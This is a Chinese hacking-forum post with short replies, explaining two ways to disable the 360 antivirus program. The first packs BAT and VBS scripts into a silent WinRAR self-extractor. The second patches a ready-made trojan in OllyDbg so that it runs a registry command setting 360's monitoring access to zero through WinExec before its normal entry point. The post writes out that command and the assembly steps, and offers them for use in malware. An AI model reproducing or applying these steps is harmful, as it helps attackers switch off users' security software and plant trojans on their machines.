干掉360的两种方法
两种方法:(一) BAT+VBS+RAR
BAT代码如下:
(代码一贴上来,居然被网站监控为不安全信息,不让发布,晕4)
然后用WINRAR建立自解压文件
路径:c:\windows
解压后运行:vbs文件名.vbs
安静模式:全部隐藏
覆盖方式:覆盖所有文件
做完即可。
(二) ASM汇编
这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。
再找一个小空段,记下地址,假设为40116A
写入:
Push 401180 (也就是那个改动的地址)
Call WinExec
Jmp 原程序入口点(在OD右边) 有空试试 看看好用不 我也试试看看好用不。 恩 思路不错 把代码发来看看 路过。支持下 路过…………………… - -好帖。。 飘过,研究研究去。 要学习啊 回帖是一种美德,一种友谊,一种礼仪, 回帖是网络最美丽的行为! 回帖是网络最美丽的行为!:lol 飘过………………………………:) :@:@:@:@:@
页:
[1]